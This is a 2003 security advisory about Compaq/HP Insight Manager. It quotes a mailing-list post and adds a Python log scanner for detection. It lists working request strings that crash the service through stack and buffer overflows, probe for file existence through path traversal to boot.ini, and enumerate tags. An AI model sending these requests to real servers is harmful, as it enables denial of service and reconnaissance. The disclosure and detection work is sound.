SecurityTracker.com
Category:   Application (Generic)  >   HPE Systems Insight Manager
Vendors:   HPE
Compaq Insight Manager Discloses File Existence to Remote Users and May Allow Denial of Service Attacks
SecurityTracker Alert ID:  1006453
SecurityTracker URL:  http://securitytracker.com/id/1006453
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 3 2003
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  

Description:   Several vulnerabilities were reported in Compaq's Insight Manager. A remote user can determine if a specified file on the system exists or not. A remote user can also cause the service to crash.

It is reported that a remote user can request the following type of URL to determine whether a specified file exists on the server:

http://[target]:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini

It is also reported that several URLs can trigger a stack overflow. The report did not indicate whether these overflows could result in arbitrary code execution. The URLs include:

http://[target]:2301/<!.StringRedirecturl>
http://[target]:2301/<!>
http://[target]:2301/survey/<!>
http://[target]:2301/<!.StringHttpRequest=Url>
http://[target]:2301/survey/<!.StringHttpRequest=Url>
http://[target]:2301/<!.StringIsapiECB=lpszPathInfo>
http://[target]:2301/<!.ObjectIsapiECB>

A buffer overflow can also be triggered with the following HTTP request:

GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0

A remote user can also view a 'TAG' list by requesting the following URL:

http://[target]:2301/<!.TableDisplayTags>

The report indicates that the above listed URLs can be used via the HTTPS port (tcp 2381), as well.

The vendor has reportedly been notified.

Impact:   A remote user can determine whether specified files exist on the server. A remote user can cause the web service to crash [Editor's note: It is not clear whether the service will automatically restart or if it requires a manual restart].
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.hp.com/
Cause:   Access control error, Boundary error, State error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   None.
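
The request patterns listed in the Description can be flagged mechanically during log review. The following is an added example, not part of the advisory or the original report; it assumes Common Log Format request logs from a proxy or sensor in front of tcp 2301/2381, and the sample lines, the function names and the 200-character threshold are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Apr/2003:10:00:01 +0000] "GET /index.htm HTTP/1.0" 200 512',
    '192.0.2.77 - - [03/Apr/2003:10:02:13 +0000] "GET /%3C!.TableDisplayTags%3E HTTP/1.0" 200 9001',
    '192.0.2.77 - - [03/Apr/2003:10:02:40 +0000] "GET /<!.DebugSearchPaths>?Url=%2F..%2F..%2Fboot.ini HTTP/1.0" 200 301',
    '192.0.2.77 - - [03/Apr/2003:10:03:05 +0000] "GET /survey/<!> HTTP/1.0" - -',
    '192.0.2.77 - - [03/Apr/2003:10:03:30 +0000] "GET /<!.FunctionContentType=' + "A" * 250 + '> HTTP/1.0" - -',
]

REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) [^"]*"')  # client address, request target
TAG = re.compile(r'<!([^>]*)>')                          # the <!...> tag syntax from the advisory
LONG_TAG = 200  # assumed threshold; the advisory cites "about 250" characters


def classify(line):
    """Return (client, tag_name, labels) for a tag request, or None for other lines."""
    m = REQUEST.match(line)
    if not m:
        return None
    client = m.group(1)
    raw_path, _, raw_query = m.group(2).partition("?")
    # Decode after splitting so %3C / %3E forms of the tag are caught too.
    path, query = unquote(raw_path), unquote(raw_query)
    tag = TAG.search(path)
    if not tag:
        return None
    body = tag.group(1)
    name = body.lstrip(".").split("=", 1)[0]
    labels = ["tag-request"]
    if len(body) > LONG_TAG:
        labels.append("overlong-tag")
    if name == "DebugSearchPaths" and ".." in query:
        labels.append("traversal-file-probe")
    if name == "TableDisplayTags":
        labels.append("tag-enumeration")
    return client, name, labels


def scan(lines):
    """Classify every line and keep only the tag requests."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for client, name, labels in scan(SAMPLE_LOG):
        print(client, name or "(empty tag)", ",".join(labels))
```
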


 Source Message Contents

Subject:  [Full-Disclosure] Compaq/HP WBEM stuff (fwd)


Compaq Insight Manager - Web-Based Management

Exploitable w3 server?
I don't know and I don't care...

Regards, bashis

> Subject: Compaq/HP WBEM stuff
> To: security-alert@hp.com
> Date: Sun, 9 Mar 2003 22:56:04 +0100 (CET)
> 
> Compaq Web-Based Management stuff.
> 
> All versions of WBEM seem to be affected..
> (These 'tags' also work with 'secure' HTTPS tcp/2381.)
> 
> http://<IP>:2301/<!.StringRedirecturl>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> 
> http://<IP>:2301/<!>       
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> 
> http://<IP>:2301/survey/<!>
> Stack overflow (0xc00000fd), Address: 0x10039869
> 
> http://<IP>:2301/<!.StringHttpRequest=Url>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> 
> http://<IP>:2301/survey/<!.StringHttpRequest=Url>
> Stack overflow (0xc00000fd), Address: 0x10039869
> 
> http://<IP>:2301/<!.StringIsapiECB=lpszPathInfo>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> 
> http://<IP>:2301/<!.ObjectIsapiECB>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
> 
> GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
> Access violation (0xc0000005), Address: 0x100368a5
> 
> Check file existence. (with a nice 'input box';)
> http://<IP>:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini
> 
> ..... plus many more tags.
> 
> Get a whole 'TAG' list with:    
> http://<IP>:2301/<!.TableDisplayTags>
> 
> Regards, bashis
> 


Copyright 2020, SecurityGlobal.net LLC